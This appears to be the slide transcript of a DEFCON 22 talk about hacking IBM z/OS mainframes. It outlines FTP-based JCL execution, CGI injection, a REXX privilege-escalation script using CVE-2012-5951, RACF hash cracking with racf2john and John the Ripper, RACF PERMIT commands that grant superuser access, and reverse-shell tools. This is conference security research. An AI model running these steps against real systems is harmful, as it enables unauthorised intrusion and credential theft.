defcon 22 - philip young - from root to special - hacking ibm
TRANSCRIPT
![Page 1: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/1.jpg)
From ROOT to SPECIAL
PWNING IBM Mainframes
Soldier of Fortran @mainframed767
![Page 2: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/2.jpg)
DISCLAIMER!
All research was done under personal time. I am not here in the name of, or on behalf of, my employer.
Any views expressed in this talk are my own and not those of my employer.
This talk discusses work performed in my spare time generally screwing around with mainframes and thinking 'what if this still works...'
@mainframed767
![Page 3: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/3.jpg)
![Page 4: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/4.jpg)
![Page 5: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/5.jpg)
PCI Security Expert
Mainframe Security Guru
ISO 27002 & PCI
Certifier
“What’s NETSTAT?”
- Our Horrible Consultant
![Page 6: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/6.jpg)
Spoken
![Page 7: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/7.jpg)
?Question?
PLAIN TXT 53%
SSL 47%
INTERNET MAINFRAMES
![Page 8: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/8.jpg)
![Page 9: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/9.jpg)
z/OS? WTF
• Most popular “mainframe” OS
• Version 2.1 out now!
Legacy my ass!
@mainframed767
![Page 10: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/10.jpg)
z/OS Demo
• Let’s take a look at this thing
• It’ll all make sense
@mainframed767
![Page 11: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/11.jpg)
@mainframed767
![Page 12: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/12.jpg)
![Page 13: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/13.jpg)
Ettercap Demo
@mainframed767
![Page 14: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/14.jpg)
Missed it
@mainframed767
![Page 15: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/15.jpg)
CGI-Bin in tyool 2014
• REXX / SH still used
• Injection simple, if you know TSO commands
@mainframed767
![Page 16: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/16.jpg)
@mainframed767
![Page 17: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/17.jpg)
![Page 18: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/18.jpg)
![Page 19: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/19.jpg)
CENSORED( CENSORED(
@mainframed767
![Page 20: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/20.jpg)
Only FTP?
• No Problem! • FTP lets you run JCL (JCL = Script)
• Command: SITE FILE=JES
@mainframed767
![Page 21: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/21.jpg)
Access Granted
• Now we have access
• FTP Script Account
• Ettercap
Now what?
@mainframed767
![Page 22: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/22.jpg)
![Page 23: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/23.jpg)
Escalate!
• Let’s escalate our privilege
• Connect with telnet/ssh/3270
• Use local priv escalation
@mainframed767
![Page 24: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/24.jpg)
Getroot.rx
• rexx script • Leverages CVE-2012-5951:
Unspecified vulnerability in IBM Tivoli NetView 1.4, 5.1 through 5.4, and 6.1 on z/OS allows local users to gain privileges by leveraging access to the normal Unix System Services (USS) security level.
![Page 25: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/25.jpg)
Tsk tsk
• IBM not really being honest here
• Works on any setuid REXX script!
@mainframed767
![Page 26: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/26.jpg)
@mainframed767
![Page 27: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/27.jpg)
DEMO
@mainframed767
![Page 28: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/28.jpg)
DEMO
![Page 29: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/29.jpg)
THANKS
• Swedish Black Hat community
• Oliver Lavery – GDS Security
• Logica Breach Investigation Files
@mainframed767
![Page 30: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/30.jpg)
![Page 31: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/31.jpg)
Keep ACCESS
• Get a copy of the RACF database
• John the Ripper
racf2john racf.db
john racf_hashes
@mainframed767
![Page 32: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/32.jpg)
Steal
• Use IRRDBU00 to convert RACF to flat file
• Search for SPECIAL accounts
• Login with a SPECIAL account
@mainframed767
![Page 33: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/33.jpg)
IRRDBU00
CENSORED(
@mainframed767
![Page 34: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/34.jpg)
Welcome to OWN zone
• SPECIAL gives access to make any change to users
• Add Users
• Make others SPECIAL, OPERATIONS
@mainframed767
![Page 35: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/35.jpg)
Give�r UID 0
@mainframed767
![Page 36: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/36.jpg)
Give�r SPECIAL
@mainframed767
![Page 37: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/37.jpg)
BPX. Wha?
• BPX.SUPERUSER – Allows people to su to root without password
![Page 38: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/38.jpg)
BPX.SUPERUSER
• As SPECIAL user type (change userid):
PERMIT BPX.SUPERUSER CLASS(FACILITY) ID(USERID) ACCESS(READ)
And
SETROPTS GENERIC(FACILITY) REFRESH
@mainframed767
![Page 39: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/39.jpg)
Tools
• CATSO – TSO Bind/Reverse shell
• TSHOCKER – Python/JCL/FTP wrapper for CATSO
• MainTP – Python/JCL/FTP getroot.rx wrapper
@mainframed767
![Page 40: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/40.jpg)
![Page 41: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/41.jpg)
TShocker
@mainframed767
![Page 42: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/42.jpg)
Maintp
• Uses GETROOT.rx + JCL and FTP and NetEBCDICat to get a remote root shell
@mainframed767
![Page 43: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/43.jpg)
@mainframed767
![Page 44: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/44.jpg)
I want one
• RDz – Rational Developer for system z
• We can use it to practice instead
• Call your IBM rep!
![Page 45: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/45.jpg)
Thanks
• Dominic White (@singe)
• The community
• IBM
@mainframed767
![Page 46: DEFCON 22 - Philip Young - From root to SPECIAL - Hacking IBM](https://reader034.vdocuments.site/reader034/viewer/2022042517/586e2b511a28ab1a068c02c4/html5/thumbnails/46.jpg)
Contact
Twitter�
@mainframed767
Email�
Websites:
Mainframed767.tumblr.com
Soldieroffortran.org